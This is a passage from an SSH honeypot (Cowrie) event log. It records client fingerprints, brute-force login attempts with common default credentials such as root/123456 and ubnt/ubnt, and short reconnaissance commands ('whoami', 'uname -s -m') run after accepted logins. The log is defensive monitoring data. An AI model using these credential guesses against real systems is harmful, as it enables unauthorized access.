{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:57:41.979004Z","src_ip":"212.227.235.229","session":"d78604ed5812"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T18:57:42.294566Z","src_ip":"212.227.235.229","session":"d78604ed5812"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:57:43.402058Z","src_ip":"212.227.235.229","session":"d78604ed5812"}
{"eventid":"cowrie.session.closed","duration":31.66831398010254,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:57:47.826970Z","src_ip":"223.76.207.252","session":"ce2ba24f7d80"}
{"eventid":"cowrie.login.success","username":"root","password":"0u89Z05578","message":"login attempt [root/0u89Z05578] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:57:56.151424Z","src_ip":"212.227.235.229","session":"c5759b0b7d38"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":19380,"dst_ip":"1.2.3.4","dst_port":22,"session":"1853028c6622","protocol":"ssh","message":"New connection: 80.94.95.15:19380 (1.2.3.4:22) [session: 1853028c6622]","sensor":"my-vps","timestamp":"2025-08-28T18:58:15.599743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:58:15.600919Z","src_ip":"80.94.95.15","session":"1853028c6622"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:58:15.654459Z","src_ip":"80.94.95.15","session":"1853028c6622"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T18:58:15.948825Z","src_ip":"80.94.95.15","session":"1853028c6622"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:58:17.002972Z","src_ip":"80.94.95.15","session":"1853028c6622"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:58:35.120748Z","src_ip":"212.227.235.229","session":"c5759b0b7d38"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-28T18:58:35.121490Z","src_ip":"212.227.235.229","session":"c5759b0b7d38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"3.8","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:58:38.891656Z","src_ip":"212.227.235.229","session":"c5759b0b7d38"}
{"eventid":"cowrie.session.closed","duration":"136.7","message":"Connection lost after 136.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:58:52.092335Z","src_ip":"212.227.235.229","session":"c5759b0b7d38"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":63013,"dst_ip":"1.2.3.4","dst_port":22,"session":"446650eb0254","protocol":"ssh","message":"New connection: 79.127.48.196:63013 (1.2.3.4:22) [session: 446650eb0254]","sensor":"my-vps","timestamp":"2025-08-28T18:59:12.617029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:59:26.011645Z","src_ip":"79.127.48.196","session":"446650eb0254"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T18:59:26.012609Z","src_ip":"79.127.48.196","session":"446650eb0254"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34120,"dst_ip":"1.2.3.4","dst_port":22,"session":"02fbf7aa93d3","protocol":"ssh","message":"New connection: 212.227.125.160:34120 (1.2.3.4:22) [session: 02fbf7aa93d3]","sensor":"my-vps","timestamp":"2025-08-28T18:59:52.983665Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:59:53.203620Z","src_ip":"212.227.125.160","session":"02fbf7aa93d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34134,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d52000aa223","protocol":"ssh","message":"New connection: 212.227.125.160:34134 (1.2.3.4:22) [session: 4d52000aa223]","sensor":"my-vps","timestamp":"2025-08-28T18:59:53.445807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:59:53.447394Z","src_ip":"212.227.125.160","session":"4d52000aa223"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:59:56.519024Z","src_ip":"212.227.125.160","session":"4d52000aa223"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T18:59:59.719253Z","src_ip":"212.227.125.160","session":"4d52000aa223"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45410,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9ecfefe2d5d","protocol":"ssh","message":"New connection: 212.227.125.160:45410 (1.2.3.4:22) [session: b9ecfefe2d5d]","sensor":"my-vps","timestamp":"2025-08-28T19:00:01.168690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:00:01.170003Z","src_ip":"212.227.125.160","session":"b9ecfefe2d5d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:00:01.391089Z","src_ip":"212.227.125.160","session":"b9ecfefe2d5d"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T19:00:03.738482Z","src_ip":"212.227.125.160","session":"b9ecfefe2d5d"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:00:04.960067Z","src_ip":"212.227.125.160","session":"b9ecfefe2d5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45412,"dst_ip":"1.2.3.4","dst_port":22,"session":"b57b08a5b9a1","protocol":"ssh","message":"New connection: 212.227.125.160:45412 (1.2.3.4:22) [session: b57b08a5b9a1]","sensor":"my-vps","timestamp":"2025-08-28T19:00:06.183645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:00:06.471900Z","src_ip":"212.227.125.160","session":"b57b08a5b9a1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:00:06.472564Z","src_ip":"212.227.125.160","session":"b57b08a5b9a1"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:00:07.956363Z","src_ip":"212.227.125.160","session":"b57b08a5b9a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:00:08.880756Z","src_ip":"212.227.125.160","session":"b57b08a5b9a1"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-28T19:00:08.881359Z","src_ip":"212.227.125.160","session":"b57b08a5b9a1"}
{"eventid":"cowrie.session.closed","duration":"15.8","message":"Connection lost after 15.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:00:09.259319Z","src_ip":"212.227.125.160","session":"4d52000aa223"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:00:10.492970Z","src_ip":"212.227.125.160","session":"b57b08a5b9a1"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:00:10.494255Z","src_ip":"212.227.125.160","session":"b57b08a5b9a1"}
{"eventid":"cowrie.login.success","username":"root","password":"100","message":"login attempt [root/100] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:00:15.741065Z","src_ip":"79.127.48.196","session":"446650eb0254"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:00:36.685699Z","src_ip":"79.127.48.196","session":"446650eb0254"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T19:00:36.686530Z","src_ip":"79.127.48.196","session":"446650eb0254"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"14.6","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 14.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:00:51.321204Z","src_ip":"79.127.48.196","session":"446650eb0254"}
{"eventid":"cowrie.session.closed","duration":"104.3","message":"Connection lost after 104.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:00:56.922951Z","src_ip":"79.127.48.196","session":"446650eb0254"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37460,"dst_ip":"1.2.3.4","dst_port":22,"session":"69a0e5eb20f4","protocol":"ssh","message":"New connection: 212.227.235.229:37460 (1.2.3.4:22) [session: 69a0e5eb20f4]","sensor":"my-vps","timestamp":"2025-08-28T19:01:10.114118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:01:10.114963Z","src_ip":"212.227.235.229","session":"69a0e5eb20f4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:01:10.220295Z","src_ip":"212.227.235.229","session":"69a0e5eb20f4"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"12345678","message":"login attempt [ansible/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T19:01:10.539111Z","src_ip":"212.227.235.229","session":"69a0e5eb20f4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:01:11.646844Z","src_ip":"212.227.235.229","session":"69a0e5eb20f4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57700,"dst_ip":"1.2.3.4","dst_port":22,"session":"1aab322b1d08","protocol":"ssh","message":"New connection: 217.72.205.35:57700 (1.2.3.4:22) [session: 1aab322b1d08]","sensor":"my-vps","timestamp":"2025-08-28T19:01:24.084380Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:01:24.085618Z","src_ip":"217.72.205.35","session":"1aab322b1d08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26095,"dst_ip":"1.2.3.4","dst_port":22,"session":"e717b87c9e25","protocol":"ssh","message":"New connection: 212.227.125.160:26095 (1.2.3.4:22) [session: e717b87c9e25]","sensor":"my-vps","timestamp":"2025-08-28T19:01:38.479366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:01:38.494555Z","src_ip":"212.227.125.160","session":"e717b87c9e25"}
{"eventid":"cowrie.client.kex","hassh":"7216c7c473918b4f83d1139b3c70dbf9","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc","arcfour"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9","sensor":"my-vps","timestamp":"2025-08-28T19:01:38.635846Z","src_ip":"212.227.125.160","session":"e717b87c9e25"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:01:42.495535Z","src_ip":"212.227.125.160","session":"e717b87c9e25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43504,"dst_ip":"1.2.3.4","dst_port":22,"session":"24fe5b53f8dd","protocol":"ssh","message":"New connection: 212.227.125.160:43504 (1.2.3.4:22) [session: 24fe5b53f8dd]","sensor":"my-vps","timestamp":"2025-08-28T19:02:53.145794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:02:53.147447Z","src_ip":"212.227.125.160","session":"24fe5b53f8dd"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","s